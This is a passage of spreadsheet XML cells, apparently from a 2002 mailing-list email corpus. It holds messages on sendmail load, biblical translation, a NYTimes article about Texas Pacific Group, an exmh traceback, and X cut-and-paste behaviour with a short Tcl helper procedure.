    <t>See your /etc/sendmail.cf file, there are a number of methods for limiting\nthe number of concurrent sendmail processes, either by load average (I'm\nsure), or concurrency (I think)... I use sendmail anymore (I use qmail) but\nI'm sure that if you look in the config file, you will see what you need...\n\nRegards,\nAdam\n\n&gt; -----Original Message-----\n&gt; From: razor-users-admin@example.sourceforge.net\n&gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Joe Berry\n&gt; Sent: Sunday, 25 August 2002 1:44 PM\n&gt; To: razor-users@example.sourceforge.net\n&gt; Subject: [Razor-users] Reducing impact from tons of email\n&gt;\n&gt;\n&gt; I'm not sure if this is really a razor problem/issue or a sendmail\n&gt; problem. Here's the scenario... My mail server is a 150mhz PC funning\n&gt; FreeBSD 4.4. Ordinarily, the machine is quite idle; it supports my\n&gt; wife's web site with Apache server running on it and a few other\n&gt; services (jabber, etc). Between the various members of our family, we\n&gt; get a fair amount of email coming in (mailing lists, etc). On\n&gt; occasion, our DSL-based ISP dies for a number of hours. When we get a\n&gt; reconnection to the Internet, I get a huge flow of emails coming in\n&gt; which are then filtered via razor. As a result, I will sometimes see\n&gt; over 20+ sendmail processes running at the same time after such an\n&gt; occasion. The machine is then REALLY slow.\n&gt;\n&gt; I noticed that my /etc/procmailrc file had had no arguments associated\n&gt; with the call to razor-check. There was something in the log, though,\n&gt; to make me suspicious that it was possibly not seeing all my razor\n&gt; files. So I have just added "-home /etc/razor" as an argument. I\n&gt; haven't had any down time since then so I cannot comment on whether\n&gt; this change has sped up my razor processing a noticable amount. (This\n&gt; paragraph may be an aside to my real problem, the first paragraph\n&gt; above; but I thought I should be complete in my description.)\n&gt;\n&gt; At any rate, has anyone else suffered from a backlog of email\n&gt; processing creating lots and lots of sendmail processes?  Is there,\n&gt; perhaps, a way to limit the number of sendmail processes?\n&gt;\n&gt; Any ideas would be welcome.\n&gt;\n&gt; Thanks,\n&gt; Joe\n&gt; ---\n&gt; Joe Berry\n&gt; joe@topshot.com\n&gt; AIM "joe topshot"\n&gt; Yahoo Msgr "joetopshot"\n&gt; jabber "joetopshot@topshot.com"\n&gt; Baltimore, MD\n&gt;\n&gt;\n&gt;\n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by: OSDN - Tired of that same old\n&gt; cell phone?  Get a new here for FREE!\n&gt; [URL]https://www.inphonic.com[/URL]\n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n&gt;\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "'James Tauber'" &lt;jtauber@jtauber.com&gt;, &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Sun, 25 Aug 2002 10:17:46 -0700</t>
  </si>
  <si>
    <t>Sun, 25 Aug 2002 10:17:46 -0700</t>
  </si>
  <si>
    <t>"'James Tauber'" &lt;jtauber@jtauber.com&gt;, &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>My source: RE: A biblical digression</t>
  </si>
  <si>
    <t>Remember I didn't say it was necessarily a good source, just that it looked good. The site was [URL]http://www.religioustolerance.org[/URL] My memory of what they said was accurate.  I do not have the competence to defend what they said.  James Tauber's response indicates a breadth of knowledge I can't match. &gt; -----Original Message----- &gt; From: James Tauber [mailto:jtauber@jtauber.com] &gt; Sent: Sunday, August 25, 2002 9:51 AM &gt; To: johnhall@evergo.net; fork@spamassassin.taint.org &gt; Subject: Re: A biblical digression &gt;  &gt; On Sat, 24 Aug 2002 11:07:00 -0700, "John Hall"  &gt; said: &gt; &gt; Ran across a site which claimed to explain the original meaning of the &gt; &gt; Ten Commandments.  It seems some of those meanings have evolved a bit, &gt; &gt; too. &gt;  &gt; By "meanings have evolved" do you [or they] mean that the Hebrew words &gt; have changed meaning or that our understanding of the Hebrew words have &gt; changed? Or do they posit a pre-Mosaic form of the laws that had &gt; evolved by time of the Pentateuch? &gt;  &gt; &gt; In particular, there was a claim that the commandment on stealing was &gt; &gt; actually specifically about 'man stealing -- selling a free man into &gt; &gt; slavery. &gt;  &gt; This seems bogus to me. A quick check of the text indicates the the &gt; Hebrew word in question is GANAV which elsewhere in the Pentateuch (eg &gt; Gen 44.8) is used to mean steal silver and gold amongst other things. &gt;  &gt; In July 1999, I made the following comment in response to a similar &gt; claim about the "real" meaning of one of the ten commandments: &gt;  &gt; """ &gt; &gt; The translations since cause problems at each successive remove &gt;  &gt; We have the original language versions, though, so this is not an &gt; issue. &gt;  &gt; &gt; I'm sure most everyone is familiar with the argument that the meaning of &gt; the commandment &gt; &gt; is 'thou shalt not murder' rather than 'kill,' &gt;  &gt; This has nothing to do with successive translations. It is based on our &gt; knowledge of the meaning of the Hebrew word "ratsach". Most modern &gt; translations I've seen translate it "murder" but elsewhere the word is &gt; used &gt; of an animal killing a human (something for which most English speakers &gt; wouldn't use the word "murder"). &gt; """ &gt; - [URL]http://www.xent.com[/URL] &gt;  &gt;  &gt;  &gt; James &gt; -- &gt;   James Tauber &gt;   jtauber@jtauber.com [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.religioustolerance.org http://www.xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: khare@alumni.caltech.edu\nDate: Sun, 25 Aug 2002 08:34:47 -0400 (EDT)</t>
  </si>
  <si>
    <t>Sun, 25 Aug 2002 08:34:47 -0400 (EDT)</t>
  </si>
  <si>
    <t>NYTimes.com Article: Texas Pacific Goes Where Others Fear to Spend</t>
  </si>
  <si>
    <t>This article from NYTimes.com \nhas been sent to you by khare@alumni.caltech.edu.\n\n\nTexas Pacific, in addition to its multibillion dollar portfolio detailed below, actually does invest in promising new companies, not just turnarounds. It's just that KnowNow is waaay to small of a part of their $7.2B portfolio... so far!\n\nRohit\n\nkhare@alumni.caltech.edu\n\n\nTexas Pacific Goes Where Others Fear to Spend\n\nAugust 25, 2002\nBy RIVA D. ATLAS and EDWARD WONG \n\n\n\n\n \n\nIt was one of the first calls David N. Siegel placed when\nhe became chief executive of the beleaguered US Airways\nlast March. Seeking advice on how to hammer out a leaner\nand meaner business plan, keep his planes flying and\nrenegotiate costly contracts with the unions, he flipped\nthrough his files and found the number for the Texas\nPacific Group, an investment firm headed by David\nBonderman, a former civil rights lawyer with a reputation\nfor fixing problem companies. \n\nMr. Siegel, once a top executive at Continental Airlines,\nhad watched Texas Pacific's partners turn an investment of\n$66 million in the airline, made three years after it filed\nfor bankruptcy in 1990, into a profit of more than $600\nmillion. And they had made nearly as much on their stake in\nAmerica West, which filed for bankruptcy in 1992. \n\nThat search for advice turned into an offer. Why not let\nTexas Pacific have a role in US Airways' revival? asked\nRichard Schifter, the Texas Pacific executive whom Mr.\nSiegel reached. \n\nIn June, Mr. Siegel called Mr. Schifter again. And days\nbefore US Airways announced its plans to file for\nbankruptcy two weeks ago - but after it had negotiated\nabout $550 million in concessions with its unions - Texas\nPacific, based in Fort Worth and San Francisco, agreed to\nkick in $100 million as part of a $500 million loan to keep\nthe company operating during bankruptcy. It also agreed to\nbuy $200 million of stock, or 38 percent of the company,\nand take 5 of 13 seats on the board if US Airways emerges\nfrom bankruptcy - unless another investor surfaces with a\nbetter offer. \n\n"One of the reasons we were interested is few other folks\nwere," said James Coulter, a partner at Texas Pacific, in\nan interview after the bankruptcy filing. "There aren't\nmany people around with the stomach or the knowledge to\ndelve into the airline industry." \n\nTexas Pacific, which manages $8 billion, thrives by buying\nbusinesses no one else wants. Mr. Coulter and Mr. Bonderman\nmade their names during the recession of the early 1990's\nwith investments in Continental and America West. The\nfirm's hallmark is to take an active hand in shaping\ncompanies, sometimes ousting poor managers and tapping its\nextensive network of contacts for talented replacements. \n\nNow the partners are again looking for trouble. In the last\nyear alone, Texas Pacific has announced or completed six\nacquisitions, most in unloved industries like\nsemiconductors, reinsurance and airlines. Just last month,\nit announced plans to buy Burger King, which has been\nlosing market share, for $2.26 billion. It is also bidding\nfor Bankgesellschaft Berlin, a large and troubled bank. \n\nThe most creative, and potentially lucrative, of these\ndeals could be Texas Pacific's acquisition last November of\nMEMC Electronic Materials, a semiconductor company, for $6\n- yes, just $6 - in cash. It will also guarantee a $150\nmillion bank loan. \n\nIn the last few years, most firms that specialize in\nleveraged buyouts - the use of junk bonds, bank loans and\nother borrowings to buy or take big stakes in companies -\nhave been largely inactive. Falling stock prices have made\nmanagements reluctant to sell cheaply. Companies that are\nfor sale have tangled finances or face a cash squeeze. \n\nTexas Pacific is different. "This is a terrific environment\nfor them," said Stephen Schwarzman, chief executive of the\nBlackstone Group, which also specializes in buyouts. \n\nMark Attanasio, a managing director at Trust Company of the\nWest, which has invested with Texas Pacific, said: "Most\nother buyout firms want to buy companies that are growing.\nYou don't see many guys wanting to take on operational\nfixes." \n\nLike most other buyout firms, Texas Pacific tries to keep\nits inner workings private: its partners rarely grant\ninterviews and its Web site is perpetually under\nconstruction. Mr. Bonderman, Mr. Coulter and William Price,\nthe third founding partner, declined to be interviewed for\nthis article. \n\nMr. Bonderman, 59, is known for his rumpled shirts and\nbright, patterned socks. "He likes argyle socks, and they\ntend to fall down around his ankles," said Henry Miller, an\ninvestment banker who advises troubled companies. Early in\nhis career, when he was a Washington lawyer, Mr. Bonderman\nargued a case in court wearing a brown velvet suit. \n\nWhen a Texas Pacific deal is being negotiated, he is known\nfor obsessively staying in touch, even when he is trekking\nin places like Pakistan, Nepal and, most recently, Bhutan.\n"Whenever I see a long, unfamiliar phone number pop up on\nmy caller I.D., I know it's David calling," said one\ninvestment banker who often works with Mr. Bonderman. \n\nMr. Bonderman made his reputation in the 1980's as the\nchief investment officer for Robert Bass, the Texas oilman.\nMr. Bonderman enriched Mr. Bass a second time by making\nearly bets in industries like cable television and taking\nstakes in troubled companies like American Savings &amp; Loan,\nwhich had been seized by the government. Over nearly a\ndecade, Mr. Bonderman's picks earned an average annual\nreturn of 63 percent for Mr. Bass. \n\nIn 1993, Mr. Bonderman struck out on his own with Mr.\nCoulter, a former Lehman Brothers banker who had also\nworked for Mr. Bass. They teamed up later that year with\nMr. Price, a veteran of GE Capital Capital and Bain &amp;\nCompany, a consulting firm, to form Texas Pacific. \n\nThe three men have complementary skills, investment bankers\nand other deal makers said. Mr. Bonderman is the master\nstrategist and Mr. Coulter is good at structuring deals and\nthe detailed management of the firm's purchases. Mr. Price\noften recruits managers and advises on operational issues. \n\n"David is very much the optimist, very much the deal\nmaker," said Greg Brenneman, a former president of\nContinental. "Jim is very much a counterbalance to David.\nHe will sit back and ask the tough questions. He will\napproach investments a little bit more skeptically than\nDavid does." \n\nBy the end of the 1990's, Texas Pacific was well\nestablished in deal making. It easily raised $4.5 billion\nfrom pension funds and other investors in early 2000. To\ncelebrate their war chest, the firm's partners rented San\nFrancisco's City Hall and hired the B-52's to play at a\nparty. \n\nBut as the stock market began to tumble, Texas Pacific\nhesitated. For a 17-month stretch, the partners made no\ndeals. They checked out some of the biggest corporate\nblowups, including Adelphia, Xerox and Global Crossing, but\nstayed away, finding the prices and the quality of the\nbusinesses untenable. \n\nInstead, Texas Pacific began to hastily exit some existing\ninvestments, taking more than $2 billion in profits during\nthat stretch. \n\n"They started to cash out early in the cycle," said Mario\nGiannini, chief executive of Hamilton Lane, a money\nmanagement firm, some of whose clients are Texas Pacific\ninvestors. \n\nThe good times of the late 1990's were not ideal for Texas\nPacific - it struggled to find downtrodden companies that\nneeded its help. \n\nBut Texas Pacific did manage to spot a few diamonds in the\nrough. It revived Oxford Health Plans, the health\nmaintenance organization that nearly collapsed in the\nmid-1990's, almost doubling its money after bringing in new\nmanagers and upgrading computer systems. In 1996, it made a\n$280 million investment in Ducati Motor, the Italian\nmotorcycle maker, whose profits have since more than\nquadrupled. \n\nBut Texas Pacific also stumbled, usually when it bought at\nthe top of the market. Texas Pacific's $560 million\ninvestment in the J. Crew Group, the clothing retailer, for\nwhich it paid a steep price of 10 times cash flow in 1997,\nhas been a disappointment. So has its 1999 purchase of\nBally, the shoe maker, which has suffered from lower demand\nfor luxury goods. \n\nTexas Pacific also lost more than $100 million on Zilog, a\nsemiconductor company, and Favorite Brands, a candy maker,\nboth of which filed for bankruptcy. \n\nSome of these investments have taken a toll on the firm's\nperformance. Texas Pacific is still selling off holdings in\ntwo investment funds it raised over the last decade. The\nfirst fund, a $720 million portfolio raised in 1993 and\nincluding investments made through March 1997, should\nreturn more than 40 percent, according to one Texas Pacific\ninvestor. But its second fund - $2.5 billion raised in 1997\n- could return less than half that, this investor\nestimated, since the firm had less time to take profits on\nthese investments before the stock market sank. \n\nBut because Texas Pacific has not sold many of its holdings\nin the second fund, profits on these investments could\nrebound. It is hoping, for example, that with new\nmanagement in place, J. Crew will turn around as the\neconomy rebounds. In any case, one competitor said, "their\nreturns look pretty good when you consider that some other\nfunds won't return any capital" to investors. \n\nBut with the weak economy throwing many companies into\ntrouble, Texas Pacific seems poised to repeat its earlier\nsuccess, the investor said. "They should do exceptionally\nwell," he said. \n\nTexas Pacific has a distinct style - if not formula. It\nrelies on talented, self-sufficient managers to restructure\ntroubled companies, preferring to remain hands-off, except\nfor surveillance from the boardroom. When necessary, it\nreplaces managers. \n\nLess than a year after Continental emerged from bankruptcy,\nfor example, Mr. Bonderman watched with frustration as his\nold friend Robert R. Ferguson, the chief executive, led it\nto the edge of another trip to bankruptcy court. \n\nContinental's board, where Mr. Bonderman was chairman, then\nbrought in Gordon M. Bethune, an executive at Boeing, and\nin October 1994 he replaced Mr. Ferguson as chief\nexecutive. Mr. Bethune quickly did a top-to-bottom overhaul\nof the company and is now considered a great turnaround\nartist of the industry. \n\n"The biggest conflict I've ever seen was with Bob\nFerguson," said Clark Onstad, a former general counsel for\nthe Federal Aviation Administration, in describing the\nthinking of Mr. Bonderman, whom he has known since the 1982\nBraniff bankruptcy. "He chose Bethune over his longtime\nfriend Ferguson because he thought Bethune would do a\nbetter job." \n\nAt America West, Texas Pacific initiated an even more\nextensive management overhaul. This time, the charge was\nled by Mr. Coulter and Mr. Schifter, both directors. \n\nW. Douglas Parker, the current chief executive, flew to Mr.\nCoulter's home in San Francisco to interview for the job of\nchief financial officer. They talked for hours, and Mr.\nParker said the two men quickly realized they had "somewhat\nkindred spirits." \n\nThe board replaced most senior managers at America West,\nexcept William Franke, the chief executive, who stepped\ndown last September. His restructuring plan had made the\nairline profitable a year and a half before it emerged from\nbankruptcy in August 1994. \n\nTexas Pacific owns just 3 percent of America West, worth\nabout $33.7 million. But those are controlling shares, and\nthe group holds more than 50 percent of the votes. \n\n"These are not passive investors, nor am I," said Donald L.\nSturm, a Denver businessman who serves on Continental's\nboard with Mr. Bonderman and Mr. Price. "You're active.\nYour money is at stake. Your reputation is at stake." \n\nAfter overseeing managers who worked successfully with\nunions at Continental and America West, Texas Pacific has a\ngood reputation with labor. That was one reason US Airways\nwas interested in a Texas Pacific investment, said Chris\nChiames, a spokesman for the airline. \n\nMr. Siegel wanted an investor who would "be as labor\nfriendly as possible," Mr. Chiames said. But US Airways can\nstill entertain other bids this fall, and Marvin Davis, the\nbillionaire investor from Los Angeles, has expressed\ninterest. \n\nTexas Pacific's investment in Burger King, made with\nGoldman, Sachs and Bain Capital, was announced after two\nyears of discussions among Texas Pacific's partners and the\nchain's franchisees - even before the company, which had\nbeen owned by Diageo, the liquor company, was put up for\nsale, said Julian Josephson, chairman of the National\nFranchisee Association, which represents most Burger King\nfranchisees. \n\n"We liked what they had to say about the human component of\nthe businesses they buy," Mr. Josephson said. Many other\nowners, he added, "are dismissive of labor." \n\nAt Burger King, Texas Pacific will also be working with an\nexecutive it knows. Burger King's chief executive is John\nDasburg, the former chief executive of Northwest Airlines,\nwho met Mr. Bonderman and his partners when Northwest\nbought out their stake in Continental in 1998. \n\nUnlike most buyout firms, Texas Pacific remains enamored\nwith the technology industry, despite the failure of so\nmany start-ups the last two years. It has focused on the\nsemiconductor industry, which like the airline industry is\nhighly cyclical. So far, though, results have been mixed. \n\nThe firm's 1996 acquisition of the Paradyne Corporation,\nwhich makes equipment for high-speed Internet connections,\nhas been a huge success. Texas Pacific split it in two and\ntook both parts public in the late 1990's, selling most of\nits stakes for 23 times its investment. But a much larger\ninvestment, its $400 million acquisition of Zilog, the chip\nmaker, in 1998, was made just before the economic crisis in\nAsia caused chip prices to plummet. Zilog filed for\nbankruptcy last year. \n\nTexas Pacific is still hoping for a turnaround at a third\ncompany, ON Semiconductor, which it acquired for $1.6\nbillion three years ago. It invested $100 million more last\nyear. \n\nIts latest gamble on the industry, the $6 deal for MEMC,\nmay prove the most lucrative. The cost of mailing the\npayment to E.On, based in Dsseldorf, Germany, was actually\nmore than the acquisition, one executive close to the deal\nsaid. \n\nTexas Pacific, and its partners in the deal, Trust Company\nof the West and Leonard Green &amp; Partners, agreed to\nguarantee a $150 million revolving line of credit. Texas\nPacific also assumed $900 million worth of debt, most of\nwhich it swapped for more stock in the company. \n\n"They did a good job of timing the acquisition," said\nNabeel Gareeb, the company's chief executive, who noted\nthat in the last quarter MEMC reported its first profit\nsince the fourth quarter of 2000. \n\nBut Texas Pacific's interest in airlines is clearly\nsizable. Besides its involvement in Continental, America\nWest and US Airways, the company plans to buy Gate Gourmet,\nthe catering business of the bankrupt Swissair Group. \n\nTwo years ago, Texas Pacific started a Web-based discount\nticket service called Hotwire. It put up most of the $75\nmillion in seed money, then persuaded six airlines to\ninvest with it, said Karl Peterson, the chief executive.\nHotwire, instead of asking consumers to bid on tickets, as\nPriceline does, shows the cheapest ticket on its Web site\nbut does not reveal the exact flight and travel time until\nafter the sale. \n\nThe contraction of the new economy has undoubtedly hurt\nHotwire, which is privately owned. Mr. Peterson said that\nthe company was still unprofitable but that Texas Pacific\nremains committed to it. \n\nLast spring, Mr. Peterson met Mr. Bonderman in Aspen to\ntalk about Hotwire and to go snowboarding. Mr. Bonderman\nseemed perfectly willing to accompany Hotwire down the\nsteep Internet chute. But he does have his limits on risk,\nMr. Peterson discovered. Before going down the mountain,\nMr. Bonderman strapped on a helmet.  \n\n[URL]http://www.nytimes.com[/URL]\n\n\n\nHOW TO ADVERTISE\n---------------------------------\nFor information on advertising in e-mail newsletters \nor other creative advertising opportunities with The \nNew York Times on the Web, please contact\nonlinesales@nytimes.com or visit our online media \nkit at [URL]http://www.nytimes.com[/URL]\n\nFor general information about NYTimes.com, write to \nhelp@nytimes.com.  \n\nCopyright 2002 The New York Times Company\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Gilles Fabio &lt;gilougero@wanadoo.fr&gt;\nDate: Sun, 25 Aug 2002 00:58:27 +0200</t>
  </si>
  <si>
    <t>Sun, 25 Aug 2002 00:58:27 +0200</t>
  </si>
  <si>
    <t>Gilles Fabio &lt;gilougero@wanadoo.fr&gt;</t>
  </si>
  <si>
    <t>hello everybody</t>
  </si>
  <si>
    <t>Hi everybody ! My name is Gilles, I'm 19 and I'm french. My english is very bad and I'm sorry  if you do not understand correctly my emails.  I use Linux since 3 months. Before I worked with Windows 2000 Pro. I enjoy Red  Hat... I tried Mandrake, SuSE, Debian, Slackware and my favorite of all of  them is Red Hat.  Actually I use Red Hat 7.3. I visited the web site Freshrpms, I congratulated Thias for his work. And I subscribed to this list for to know more about Red Hat and RPMs' news. Pleased to read U soon. Gilles (Nice, South of France) _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Scott Lipcon &lt;slipcon@mercea.net&gt;\nDate: Sun, 22 Sep 2002 22:58:16 -0400</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 22:58:16 -0400</t>
  </si>
  <si>
    <t>traceback in new exmh</t>
  </si>
  <si>
    <t>I just updated to the latest CVS - I had been running a build from June.  \nHitting the Flist button gives the following traceback:\n\nsyntax error in expression "int(17+1+(222-)*(19-17-2)/(224-))"\n    while executing\n"expr int($minLine+1+($msgid-$minMsg)*($maxLine-$minLine-2)/($maxMsg-$minMsg))"\n    (procedure "Ftoc_FindMsg" line 57)\n    invoked from within\n"Ftoc_FindMsg $i"\n    (procedure "Ftoc_ShowSequences" line 16)\n    invoked from within\n"Ftoc_ShowSequences $F"\n    (procedure "ScanFolder" line 81)\n    invoked from within\n"ScanFolder inbox 0"\n    invoked from within\n"time [list ScanFolder $F $adjustDisplay"\n    (procedure "Scan_Folder" line 2)\n    invoked from within\n"Scan_Folder $exmh(folder) $ftoc(showNew)"\n    (procedure "Inc_PresortFinish" line 7)\n    invoked from within\n"Inc_PresortFinish"\n    invoked from within\n".fops.flist invoke"\n    ("uplevel" body line 1)\n    invoked from within\n"uplevel #0 [list $w invoke]"\n    (procedure "tkButtonUp" line 7)\n    invoked from within\n"tkButtonUp .fops.flist\n"\n    (command bound to event)\n\n\nIt seems to only happen in a folder with no unseen messages.\n\nChris, is this related to your recent changes?\n\nScott\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Sun, 22 Sep 2002 22:21:49 -0700</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 22:21:49 -0700</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;"Kevin Oberman" said:\n &gt; It did for me, but I am not willing to say it is not a tcl/tk issue as\n &gt; other apps seemed to work OK for cut and paste and Tk does its\n &gt; clipboard stuff a bit differently than most toolkits. So I'm not\n &gt; about to place blame. Just reporting my experience.\n\nOne more salvo on X and cut/paste.  X specifies at least two *mechanisms*\nfor cut/paste, but as usual mandates no *policy*.  Windows and Macintosh\nhave a slightly different mechanism and one uniform policy.  I'm quite\nsure that Tk implements all PRIMARY and CLIPBOARD selections accurately.\nThe PRIMARY selection is the one that is tied to the visible selection\non your X display.  The CLIPBOARD selection is the one with the explicit\nCopy step, and is the same as what you have on Windows and Macintosh.\nHowever, exmh throws in support for the cutbuffer mechanism, which is\nanother archaic mechanism supported at one point (perhaps still today)\nby versions of emacs.  Exmh has a policy that tries to unify all these\nmechanisms under one umbrella, and by all reports it is not that great.\n\nI would encourage folks to play with those 10 lines of code in\nText_Selection and report what works well for them.  We may come up\nwith 8 lines that work for everyone, or perhaps introduce yet another\nsetting that lets folks choose between a few useful models.  Of course,\nthat's an admission of policy failure, but I'm willing to do that.\n\n--\nBrent Welch\nSoftware Architect, Panasas Inc\nPioneering the World's Most Scalable and Agile Storage Network\n[URL]www.panasas.com[/URL]\nwelch@panasas.com\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Sun, 22 Sep 2002 22:11:03 -0700</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 22:11:03 -0700</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;Hal DeVore said:  &gt;     "Brent said in his book"  &gt;     This Paste function can be convenient, but it turns out that  &gt;     users still need to keep track of the difference between the  &gt;     two selections.  If a user only understands the CLIPBOARD,  &gt;     then the user of PRIMARY is only surprising.  I learned that  &gt;     it is best to have a separate paste user action for the two  &gt;     selections.  The convention is that  sets  &gt;     the insert point and inserts the PRIMARY selection. ... The  &gt;     &lt;&gt; event (e.g., the Paste key) simply inserts the  &gt;     CLIPBOARD selection at the current insert point. ... Yeah, I learned by hearing exmh users scream in agony.  Sorry about all that.  We should be able to clean this up.  If you grep for "bind" in seditBind you quickly find the Text_Selection proc I described in the previous email. -- Brent Welch Software Architect, Panasas Inc Pioneering the World's Most Scalable and Agile Storage Network [URL]www.panasas.com[/URL] welch@panasas.com _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Sun, 22 Sep 2002 22:08:16 -0700</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 22:08:16 -0700</t>
  </si>
  <si>
    <t>It's all here in these 10 lines, otherwise known as the\n"I'll try my damnest to paste something" procedure:\n\n# Return the current selection (from any window) or cut buffer 0.\nproc Text_Selection {} {\n    if [catch {selection get} sel] {\n        if [catch {selection get -selection CLIPBOARD} sel] {\n            if [catch {cutbuffer get 0} sel] {\n                return ""\n            }\n        }\n    }\n    return $sel\n}\n\nThis is in textSelection.tcl, and is what exmh uses to find text to paste.\nIt is that last "cutbuffer get" that is wacky, because exmh sticks its\nown deletions into that little know stash, and is probably the only\napplication on the planet that still looks there.  We should probably\njust disable that - try this variant:\n\nproc Text_Selection {} {\n    if [catch {selection get} sel] {\n        if [catch {selection get -selection CLIPBOARD} sel] {\n            return ""\n        }\n    }\n    return $sel\n}\n\nEverything funnels through here, so you just need to hack this one spot.\n\n\n&gt;&gt;&gt;Rick Baartman said:\n &gt; I've never understood the mouse buffer operation with exmh either. Here's th\n     e \n &gt; behaviour I have. I have exmh and XEmacs windows up, and a terminal window. \n     (I \n &gt; also have gnome1.4 running and enlightenment as wm.) I select text in the ex\n     mh \n &gt; window and while it is highlighted, I can paste into anything else. If I sel\n     ect \n &gt; it and then click so the highlighting is off, then what I paste is not the \n &gt; recently-selected text in exmh, but an old selection. If I select in XEmacs \n     and \n &gt; leave it highlighted, I can paste it into exmh sedit window; but if it is no\n      \n &gt; longer highlighted, what I paste is an old selection. I can live with this \n &gt; behaviour except for one additional thing. If nothing is highlighted, then w\n     hat \n &gt; I paste into exmh is different from what I paste into other windows. To be m\n     ore \n &gt; specific, here's what gets pasted if nothing is highlighted:\n &gt; \n &gt; Application       What gets pasted\n &gt; \n &gt; XEmacs            whatever was last selected unless it was last selected in \n     exmh\n &gt; xterm             same as XEmacs\n &gt; AbiWord           nothing\n &gt; Nedit             nothing\n &gt; sedit             Whatever was last highlighted in sedit and overwritten\n &gt; \n &gt; The last needs some amplification. If I highlight something in sedit, then \n &gt; obviously that's what gets pasted. If the highlighting is off, then what get\n     s \n &gt; pasted is NOT what was last highlighted in sedit, but what was last highligh\n     ted \n &gt; and typed over (I have "Type Kills SEL" on.).\n &gt; \n &gt; It seems that exmh and sedit are the oddballs here. Very often when I try to\n      \n &gt; paste something in sedit I end up muttering WTF??\n &gt; \n &gt; --\n &gt; rick\n &gt; \n &gt; \n &gt; \n &gt; _______________________________________________\n &gt; Exmh-users mailing list\n &gt; Exmh-users@redhat.com\n &gt; [URL]https://listman.redhat.com[/URL]\n\n--\nBrent Welch\nSoftware Architect, Panasas Inc\nPioneering the World's Most Scalable and Agile Storage Network\n[URL]www.panasas.com[/URL]\nwelch@panasas.com\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Sun, 22 Sep 2002 22:00:37 -0700</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 22:00:37 -0700</t>
  </si>
  <si>
    <t>I need to experiment with ripping out all my "sophisticated" cut/paste\ncode.  This is mostly historical accident from dealing with very early\nversions of Tk, and the emacs "cutbuffer", and other wierd junk.\nYou can, too, by hacking upon seditBind.tcl appropriately.\n\n&gt;&gt;&gt;Hal DeVore said:\n &gt; \n &gt; \n &gt; &gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Tony" == Tony Nugent wrote:\n &gt; \n &gt;   Tony&gt; I can't even mark text in an exmh message window and then\n &gt;   Tony&gt; paste it into a terminal window, the cut buffer seems to\n &gt;   Tony&gt; be completely empty (and its previous contents are no\n &gt;   Tony&gt; longer there either).\n &gt; \n &gt; Brent confessed recently that he had tried to subvert the X\n &gt; model(s) of copy and paste.  Not in those words... but that\n &gt; was how I read it. ;)\n &gt; \n &gt; I have a lot of trouble copying and pasting from or to exmh \n &gt; across a VNC link (from things in the vncviewer to things not in \n &gt; it and vice versa).  As long as I stick to apps being "normally" \n &gt; displayed on my X server I don't have much of a problem.\n &gt; \n &gt; My recollection from my X programming days is that the X model,\n &gt; like everything in X, is more complex than the human brain can\n &gt; handle.  It also is very different from the MS-Windows model.\n &gt; And I get the feeling that Tk tries to "unify" those two models\n &gt; and fails.  Not sure what the exmh-specific contribution to the \n &gt; confusion is, frankly.\n &gt; \n &gt; --Hal\n &gt; \n &gt; \n &gt; \n &gt; \n &gt; _______________________________________________\n &gt; Exmh-users mailing list\n &gt; Exmh-users@redhat.com\n &gt; [URL]https://listman.redhat.com[/URL]\n\n--\nBrent Welch\nSoftware Architect, Panasas Inc\nPioneering the World's Most Scalable and Agile Storage Network\n[URL]www.panasas.com[/URL]\nwelch@panasas.com\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Sun, 22 Sep 2002 21:58:30 -0700</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 21:58:30 -0700</t>
  </si>
  <si>
